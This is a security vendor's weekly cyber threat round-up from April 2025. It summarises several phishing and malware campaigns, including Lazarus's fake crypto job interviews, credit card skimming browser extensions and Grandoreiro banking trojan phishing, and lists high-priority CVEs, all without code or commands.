The Silobreaker Weekly Geopolitical Risk Briefs

Download Report

Weekly Cyber Round-up

Intelligence Report

April 3, 2025

ClickFake Interview campaign leverages fake crypto recruitment scheme to deliver GolangGhost

In February 2025, Sekoia researchers observed a campaign by the North Korean threat actor Lazarus Group, dubbed ClickFake Interview, targeting job seekers within the cryptocurrency industry. The campaign leverages fake job offers, legitimate job interview websites, and the ClickFix tactic to execute the GolangGhost backdoor and FrostyFerret. The infection chain varies by operating system, with both Windows and macOS systems targeted by the campaign. ClickFake Interview initially shares URLs on social media, inviting victims to a fake online cryptocurrency-related interview. Victims are required to create an introductory video using their camera, which displays an error message that instructs the user to download a driver. The user is then prompted to follow a ClickFix prompt to update their driver, with a VBScript used to download and execute the GolangGhost backdoor on Windows, while a bash script is used to execute FrostyFerret before launching GolangGhost on macOS. ClickFake Interview is believed to be a continuation of the Contagious Interview campaign.

Get the alert delivered directly to your inbox

RolandSkimmer campaign uses malicious browser extensions to steal financial data

Fortinet researchers observed a credit card skimming campaign, dubbed RolandSkimmer, targeting individuals in Bulgaria. The campaign leverages malicious browser extensions across Google Chrome, Microsoft Edge, and Firefox to harvest and exfiltrate sensitive financial data from users. The attack begins with a malicious ZIP file containing a deceptive LNK file, which deploys obfuscated VBScripts to establish persistent and covert access. The attacker then downloads additional files, with malicious JavaScript payloads and encoded RAR files used to install the malicious browser extensions, depending on the target browser. The attackers also replaced legitimate Microsoft Edge shortcuts in the Desktop and Taskbar with the malicious shortcuts.

Phishing campaigns distribute Grandoreiro banking trojan to Latin America and Europe

Forcepoint researchers observed a resurgence in Grandoreiro banking trojan activity, with the malware currently being distributed in large-scale phishing campaigns to banking users in Latin American and Europe. Threat actors leverage VPS hosting providers and obfuscation techniques to evade detection, as well as dynamic URLs and social engineering to maximize the malware’s reach and effectiveness. A recent campaign, targeting Mexico, Argentina, and Spain, impersonates tax agencies and uses fraudulent government emails to trick users. The emails are marked as high importance and contain malicious URLs that redirect users to the website of the Contabo hosting service, where they are prompted to download a PDF, which downloads a ZIP file. The ZIP file leads victims to download an obfuscated VBScript and an EXE payload disguised as an Acrobat Reader error pop-up designed to steal credentials.

Gamaredon targets Ukrainian users with war-related lures to deliver Remcos backdoor

Cisco Talos researchers discovered a suspected Gamaredon campaign, ongoing since at least November 2024, targeting Ukrainian users with malicious LNK files that ultimately deliver the Remcos backdoor. The LNK files are compressed inside ZIP archives and often disguised as Office documents, named using Russian words related to the movement of troops in Ukraine as a lure. The researchers believe that Gamaredon is likely maintaining its technique of sending phishing emails attached with a ZIP file or containing a URL link to download the file from a remote host. The LNK files contain PowerShell code that downloads and executes the next-stage payload in ZIP format, as well as a decoy file. The ZIP payload contains an executable binary that loads a malicious DLL via DLL sideloading, which in turn serves as the loader for Remcos.

First Ukrainian International Bank users targeted with Emmenhtal to deliver SmokeLoader

G DATA researchers discovered a campaign impersonating First Ukrainian International Bank to deliver the Emmenhtal malware loader to users. The malware was observed being chained with SmokeLoader, enabling the attackers to deploy additional malware dynamically using SmokeLoader’s modular capabilities. The campaign starts with an email claiming to confirm a payment has been made. The email contains a 7z archive file attachment with supposed payment instructions, which, once extracted, reveals a decoy PDF file and a PDF shortcut. The latter is used to download a file from a remote server that executes mshta via PowerShell to download Emmenhtal, which is later used to deploy SmokeLoader. 

High Priority Vulnerabilities

Name name Software Base
Score
Temp
Score
CVE-2025-0282 Neurons for ZTA gateways 9.0 7.7
Related: RESURGE malware used to create web shells following Ivanti Connect Secure compromise
CVE-2024-20439 Smart License Utility 9.8 9.4
Related: CISA Warns of Active Exploitation of Cisco Smart Licensing Utility Flaw
CVE-2024-31982 xwiki-platform-search-ui 9.8 7.0
Related: Exploit attempts observed targeting XWiki OS command injection flaw
CVE-2020-8515 Vigor300B 9.8 9.8
Related: Targeting of DrayTek routers observed amidst reports of reboots
CVE-2025-24201 macOS 8.8 6.0
Related: Apple patches multiple zero-day flaws in iPhone, iPads, and macOS Sonoma

Get the full report
delivered to your inbox​

By filling out and submitting this request you give us your consent to use and store the information  you have provided for the purpose set out above or in connection with it. For more information, see our Privacy Policy.